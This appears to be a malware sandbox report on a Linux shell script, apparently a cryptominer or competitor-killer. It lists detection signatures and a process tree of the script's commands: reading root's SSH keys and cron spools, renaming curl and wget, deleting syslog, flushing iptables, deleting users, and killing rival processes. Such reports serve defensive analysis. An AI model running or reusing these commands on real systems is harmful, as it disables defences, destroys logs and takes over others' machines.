196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910

Analysis

max time kernel
150s
max time network
31s
platform
debian-9_mipsel
resource
debian9-mipsel-20240611-en
resource tags

arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
23/01/2025, 06:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
Size

37KB
MD5

d6648f420423f9dad4292a606f743c4b
SHA1

dcae47ec15e96274a39fcce4352077846ebf7b70
SHA256

196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910
SHA512

3820b4fb435732fef05157ff0713ed3a62269dc1c21240dbf7e2e59191a0f34050247573b4d9758cd84495fb28d8f346e381b8f09a9041c70ca88333b1303f93
SSDEEP

384:Q7pQQwQHDf6lpTWg3vM4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdUeUoJpJydIi:Q7xFNB48Fkc2zq0xvMGdl18r

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

Flushes firewall rules 1 TTPs 1 IoCs

Flushes/ disables firewall rules inside the Linux kernel.

defense_evasion

Disable or Modify System Firewall

T1562.004

pid	Process
747	iptables

Attempts to change immutable files 64 IoCs

Modifies inode attributes on the filesystem to allow changing of immutable files.

pid	Process
1659	xargs
1671	xargs
1731	xargs
870	xargs
1099	xargs
1440	xargs
1550	xargs
745	chattr
1619	xargs
1727	xargs
1977	Process not Found
1643	xargs
1990	Process not Found
849	xargs
906	xargs
1283	xargs
1599	xargs
777	xargs
1570	xargs
759	grep
1263	xargs
1560	xargs
2047	Process not Found
1446	xargs
1971	Process not Found
2055	Process not Found
2007	Process not Found
962	xargs
1009	xargs
1166	xargs
1986	Process not Found
1193	xargs
1983	Process not Found
1725	xargs
2087	Process not Found
2120	Process not Found
901	xargs
1203	xargs
1297	xargs
1647	xargs
1661	xargs
1729	xargs
1969	Process not Found
1276	xargs
1972	Process not Found
1398	xargs
2039	Process not Found
1243	xargs
1665	xargs
1476	xargs
1703	xargs
1975	Process not Found
1715	xargs
1964	Process not Found
1016	xargs
1036	xargs
1617	xargs
1635	xargs
1707	xargs
1908	Process not Found
1988	Process not Found
2107	Process not Found
825	xargs
885	xargs

Disables AppArmor 28 IoCs

Disables AppArmor security module.

pid	Process
2096	Process not Found
2096	Process not Found
2076	Process not Found
2103	Process not Found
2107	Process not Found
2108	Process not Found
2109	Process not Found
2096	Process not Found
2115	Process not Found
2106	Process not Found
2114	Process not Found
2110	Process not Found
2096	Process not Found
2076	Process not Found
2076	Process not Found
2104	Process not Found
2096	Process not Found
2076	Process not Found
2095	Process not Found
2101	Process not Found
2076	Process not Found
2111	Process not Found
2113	Process not Found
2096	Process not Found
2099	Process not Found
2105	Process not Found
2112	Process not Found
2076	Process not Found

Enumerates running processes
Discovers information about currently running processes on the system

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Reads CPU attributes 1 TTPs 64 IoCs

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pgrep
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	pkill
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/online	ps

Enumerates kernel/hardware configuration 1 TTPs 32 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

discovery

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found
File opened for reading	/sys/fs/kdbus/0-system/bus	Process not Found

Process Discovery 1 TTPs 64 IoCs

Adversaries may try to discover information about running processes.

discovery

Process Discovery

T1057

pid	Process
991	ps
1151	ps
1386	ps
1516	ps
986	ps
1100	ps
1204	ps
1229	ps
1346	ps
1393	ps
1292	ps
1418	ps
1424	ps
871	ps
998	ps
1194	ps
1286	ps
1126	ps
1271	ps
1320	ps
1327	ps
2116	Process not Found
927	ps
1082	ps
1117	ps
1254	ps
1526	ps
939	ps
1106	ps
1366	ps
1471	ps
1453	ps
1131	ps
1141	ps
1167	ps
1359	ps
1244	ps
1313	ps
1379	ps
1511	ps
1053	ps
1333	ps
1372	ps
1489	ps
876	ps
907	ps
933	ps
1012	ps
1039	ps
1501	ps
1506	ps
1219	ps
1266	ps
1441	ps
1483	ps
897	ps
946	ps
972	ps
1112	ps
1121	ps
1146	ps
1189	ps
1339	ps
1279	ps

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/4/status	ps
File opened for reading	/proc/69/status	ps
File opened for reading	/proc/69/status	ps
File opened for reading	/proc/118/cmdline	pkill
File opened for reading	/proc/78/cmdline	pkill
File opened for reading	/proc/673/status	pkill
File opened for reading	/proc/119/cmdline	pkill
File opened for reading	/proc/675/status	pkill
File opened for reading	/proc/1/cmdline	pkill
File opened for reading	/proc/36/status	pkill
File opened for reading	/proc/68/cmdline	ps
File opened for reading	/proc/315/status	ps
File opened for reading	/proc/9/cmdline	ps
File opened for reading	/proc/382/status	pgrep
File opened for reading	/proc/21/status	pgrep
File opened for reading	/proc/82/status	ps
File opened for reading	/proc/3/cmdline	ps
File opened for reading	/proc/18/cmdline	pgrep
File opened for reading	/proc/701/status	pgrep
File opened for reading	/proc/372/stat	ps
File opened for reading	/proc/75/cmdline	ps
File opened for reading	/proc/1066/cmdline	ps
File opened for reading	/proc/433/stat	ps
File opened for reading	/proc/348/cmdline	pgrep
File opened for reading	/proc/13/status	ps
File opened for reading	/proc/1122/status	ps
File opened for reading	/proc/21/status	pkill
File opened for reading	/proc/16/stat	ps
File opened for reading	/proc/433/status	pkill
File opened for reading	/proc/73/cmdline	pkill
File opened for reading	/proc/22/status	ps
File opened for reading	/proc/702/cmdline	ps
File opened for reading	/proc/315/cmdline	ps
File opened for reading	/proc/1501/status	ps
File opened for reading	/proc/315/status	pgrep
File opened for reading	/proc/675/cmdline	pkill
File opened for reading	/proc/82/status	pkill
File opened for reading	/proc/75/status	pkill
File opened for reading	/proc/670/stat	ps
File opened for reading	/proc/382/stat	ps
File opened for reading	/proc/110/status	ps
File opened for reading	/proc/8/cmdline	ps
File opened for reading	/proc/19/status	pgrep
File opened for reading	/proc/76/stat	ps
File opened for reading	/proc/230/cmdline	ps
File opened for reading	/proc/379/stat	ps
File opened for reading	/proc/322/status	pgrep
File opened for reading	/proc/meminfo	ps
File opened for reading	/proc/665/stat	ps
File opened for reading	/proc/11/status	pgrep
File opened for reading	/proc/708/status	ps
File opened for reading	/proc/37/status	ps
File opened for reading	/proc/4/stat	ps
File opened for reading	/proc/36/stat	ps
File opened for reading	/proc/2/status	ps
File opened for reading	/proc/5/status	pgrep
File opened for reading	/proc/2119/cmdline	Process not Found
File opened for reading	/proc/110/status	pgrep
File opened for reading	/proc/36/cmdline	ps
File opened for reading	/proc/1/status	ps
File opened for reading	/proc/self/stat	ps
File opened for reading	/proc/37/status	pgrep
File opened for reading	/proc/13/status	pgrep
File opened for reading	/proc/23/status	ps

System Network Configuration Discovery 1 TTPs 4 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1077	grep
1114	grep
1348	grep
1870	Process not Found

Writes file to tmp directory 8 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/redis2	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/newsvc.sh	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/svcupdate	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/svcguard	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/svcworkmanager	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/svcupdates	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/dev/null	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
File opened for modification	/tmp/kdevtmpfsi	196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh

/tmp/196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
/tmp/196b528e7c816ef6dc101e193bb73338e2e6c696137302f991099682e52bc910.sh
1⤵
- Writes file to tmp directory
PID:703
- /usr/bin/curl
  curl http://ip-api.com/json/
  2⤵
  PID:704
- /bin/sed
  sed "s/,/\\n/g"
  2⤵
  PID:705
- /bin/grep
  grep -i CN
  2⤵
  PID:706
- /bin/sync
  sync
  2⤵
  PID:730
- /bin/cat
  cat /var/spool/cron/
  2⤵
  PID:734
- /bin/cat
  cat /root/.ssh/authorized_keys
  2⤵
  PID:737
- /bin/mv
  mv /usr/bin/curl /usr/bin/url
  2⤵
  PID:739
- /bin/mv
  mv /usr/bin/url /usr/bin/cd1
  2⤵
  PID:740
- /bin/mv
  mv /usr/bin/wget /usr/bin/get
  2⤵
  PID:741
- /bin/mv
  mv /usr/bin/get /usr/bin/wd1
  2⤵
  PID:742
- /bin/rm
  rm -rf /var/log/syslog
  2⤵
  PID:744
- /usr/bin/chattr
  chattr -iua /tmp/
  2⤵
  - Attempts to change immutable files
  PID:745
- /usr/bin/chattr
  chattr -iua /var/tmp/
  2⤵
  PID:746
- /sbin/iptables
  iptables -F
  2⤵
  - Flushes firewall rules
  PID:747
- /usr/sbin/userdel
  userdel akay
  2⤵
  PID:750
- /usr/sbin/userdel
  userdel vfinder
  2⤵
  PID:752
- /bin/rm
  rm -rf "/tmp/addres*"
  2⤵
  PID:753
- /bin/rm
  rm -rf "/tmp/walle*"
  2⤵
  PID:754
- /bin/rm
  rm -rf /tmp/keys
  2⤵
  PID:755
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:756
- /bin/grep
  grep -i "[a]liyun"
  2⤵
  PID:757
- /bin/ps
  ps aux
  2⤵
  PID:758
- /bin/grep
  grep -i "[y]unjing"
  2⤵
  - Attempts to change immutable files
  PID:759
- /bin/rm
  rm -f /tmp/.null
  2⤵
  PID:760
- /sbin/sysctl
  sysctl -w "vm.nr_hugepages=128"
  2⤵
  PID:761
- /bin/grep
  grep 185.71.65.238
  2⤵
  PID:763
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:765
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:764
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:766
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:769
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:771
- /bin/grep
  grep 140.82.52.87
  2⤵
  PID:768
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:770
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:777
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:775
- /bin/grep
  grep -v -
  2⤵
  PID:776
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:774
- /bin/grep
  grep :443
  2⤵
  PID:773
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:783
- /bin/grep
  grep -v -
  2⤵
  PID:782
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:781
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:780
- /bin/grep
  grep :23
  2⤵
  PID:779
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:789
- /bin/grep
  grep -v -
  2⤵
  PID:788
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:787
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:786
- /bin/grep
  grep :443
  2⤵
  PID:785
- /bin/grep
  grep -v -
  2⤵
  PID:794
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:793
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:792
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:795
- /bin/grep
  grep :143
  2⤵
  PID:791
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:801
- /bin/grep
  grep -v -
  2⤵
  PID:800
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:799
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:798
- /bin/grep
  grep :2222
  2⤵
  PID:797
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:807
- /bin/grep
  grep -v -
  2⤵
  PID:806
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:805
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:804
- /bin/grep
  grep :3333
  2⤵
  PID:803
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:813
- /bin/grep
  grep -v -
  2⤵
  PID:812
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:811
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:810
- /bin/grep
  grep :3389
  2⤵
  PID:809
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:819
- /bin/grep
  grep -v -
  2⤵
  PID:818
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:817
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:816
- /bin/grep
  grep :5555
  2⤵
  PID:815
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:825
- /bin/grep
  grep -v -
  2⤵
  PID:824
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:823
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:822
- /bin/grep
  grep :6666
  2⤵
  PID:821
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:831
- /bin/grep
  grep -v -
  2⤵
  PID:830
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:829
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:828
- /bin/grep
  grep :6665
  2⤵
  PID:827
- /bin/grep
  grep -v -
  2⤵
  PID:836
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:837
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:835
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:834
- /bin/grep
  grep :6667
  2⤵
  PID:833
- /bin/grep
  grep -v -
  2⤵
  PID:842
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:841
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:843
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:840
- /bin/grep
  grep :7777
  2⤵
  PID:839
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:849
- /bin/grep
  grep -v -
  2⤵
  PID:848
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:847
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:846
- /bin/grep
  grep :8444
  2⤵
  PID:845
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:855
- /bin/grep
  grep -v -
  2⤵
  PID:854
- /usr/bin/awk
  awk "-F[/]" "{print \$1}"
  2⤵
  PID:853
- /usr/bin/awk
  awk "{print \$7}"
  2⤵
  PID:852
- /bin/grep
  grep :3347
  2⤵
  PID:851
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:860
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:859
- /bin/grep
  grep :3333
  2⤵
  PID:858
- /bin/grep
  grep -v grep
  2⤵
  PID:857
- /bin/ps
  ps aux
  2⤵
  PID:856
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:865
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:864
- /bin/grep
  grep :5555
  2⤵
  PID:863
- /bin/grep
  grep -v grep
  2⤵
  PID:862
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:861
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:870
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:869
- /bin/grep
  grep "kworker -c\\"
  2⤵
  PID:868
- /bin/grep
  grep -v grep
  2⤵
  PID:867
- /bin/ps
  ps aux
  2⤵
  PID:866
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:875
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:874
- /bin/grep
  grep log_
  2⤵
  PID:873
- /bin/grep
  grep -v grep
  2⤵
  PID:872
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:871
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:880
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:879
- /bin/grep
  grep systemten
  2⤵
  PID:878
- /bin/grep
  grep -v grep
  2⤵
  PID:877
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:876
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:885
- - /usr/local/sbin/kill
    kill -9 10
    3⤵
    PID:886
- - /usr/local/bin/kill
    kill -9 10
    3⤵
    PID:886
- - /usr/sbin/kill
    kill -9 10
    3⤵
    PID:886
- - /usr/bin/kill
    kill -9 10
    3⤵
    PID:886
- - /sbin/kill
    kill -9 10
    3⤵
    PID:886
- - /bin/kill
    kill -9 10
    3⤵
    PID:886
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:884
- /bin/grep
  grep netns
  2⤵
  PID:883
- /bin/grep
  grep -v grep
  2⤵
  PID:882
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:881
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:891
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:890
- /bin/grep
  grep -v grep
  2⤵
  PID:888
- /bin/grep
  grep voltuned
  2⤵
  PID:889
- /bin/ps
  ps aux
  2⤵
  PID:887
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:896
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:895
- /bin/grep
  grep darwin
  2⤵
  PID:894
- /bin/grep
  grep -v grep
  2⤵
  PID:893
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:892
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:901
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:900
- /bin/grep
  grep /tmp/dl
  2⤵
  PID:899
- /bin/grep
  grep -v grep
  2⤵
  PID:898
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:897
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:906
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:905
- /bin/grep
  grep /tmp/ddg
  2⤵
  PID:904
- /bin/grep
  grep -v grep
  2⤵
  PID:903
- /bin/ps
  ps aux
  2⤵
  PID:902
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:911
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:910
- /bin/grep
  grep /tmp/pprt
  2⤵
  PID:909
- /bin/grep
  grep -v grep
  2⤵
  PID:908
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:907
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:916
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:915
- /bin/grep
  grep /tmp/ppol
  2⤵
  PID:914
- /bin/grep
  grep -v grep
  2⤵
  PID:913
- /bin/ps
  ps aux
  2⤵
  PID:912
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:921
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:920
- /bin/grep
  grep "/tmp/65ccE*"
  2⤵
  PID:919
- /bin/grep
  grep -v grep
  2⤵
  PID:918
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  PID:917
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:925
- /bin/grep
  grep "/tmp/jmx*"
  2⤵
  PID:924
- /bin/grep
  grep -v grep
  2⤵
  PID:923
- /bin/ps
  ps aux
  2⤵
  PID:922
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:926
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:931
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:930
- /bin/grep
  grep "/tmp/2Ne80*"
  2⤵
  PID:929
- /bin/grep
  grep -v grep
  2⤵
  PID:928
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:927
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:937
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:936
- /bin/grep
  grep IOFoqIgyC0zmf2UR
  2⤵
  PID:935
- /bin/grep
  grep -v grep
  2⤵
  PID:934
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:933
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:943
- /bin/grep
  grep 45.76.122.92
  2⤵
  PID:941
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:942
- /bin/grep
  grep -v grep
  2⤵
  PID:940
- /bin/ps
  ps aux
  2⤵
  - Reads CPU attributes
  - Process Discovery
  PID:939
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:950
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:949
- /bin/grep
  grep 51.38.191.178
  2⤵
  PID:948
- /bin/grep
  grep -v grep
  2⤵
  PID:947
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:946
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:955
- /bin/grep
  grep 51.15.56.161
  2⤵
  PID:954
- /bin/grep
  grep -v grep
  2⤵
  PID:953
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:952
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:956
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:962
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:961
- /bin/grep
  grep 86s.jpg
  2⤵
  PID:960
- /bin/grep
  grep -v grep
  2⤵
  PID:959
- /bin/ps
  ps aux
  2⤵
  - Reads runtime system information
  PID:958
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:969
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:968
- /bin/grep
  grep aGTSGJJp
  2⤵
  PID:967
- /bin/grep
  grep -v grep
  2⤵
  PID:966
- /bin/ps
  ps aux
  2⤵
  PID:965
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:976
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:975
- /bin/grep
  grep nMrfmnRa
  2⤵
  PID:974
- /bin/grep
  grep -v grep
  2⤵
  PID:973
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:972
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:983
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:982
- /bin/grep
  grep PuNY5tm2
  2⤵
  PID:981
- /bin/grep
  grep -v grep
  2⤵
  PID:980
- /bin/ps
  ps aux
  2⤵
  PID:979
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:990
- /usr/bin/awk
  awk "{print \$2}"
  2⤵
  PID:989
- /bin/grep
  grep I0r8Jyyt
  2⤵
  PID:988
- /bin/grep
  grep -v grep
  2⤵
  PID:987
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  PID:986
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:995
- /bin/grep
  grep AgdgACUD
  2⤵
  PID:993
- /bin/grep
  grep -v grep
  2⤵
  PID:992
- /bin/ps
  ps aux
  2⤵
  - Process Discovery
  - Reads runtime system information
  PID:991
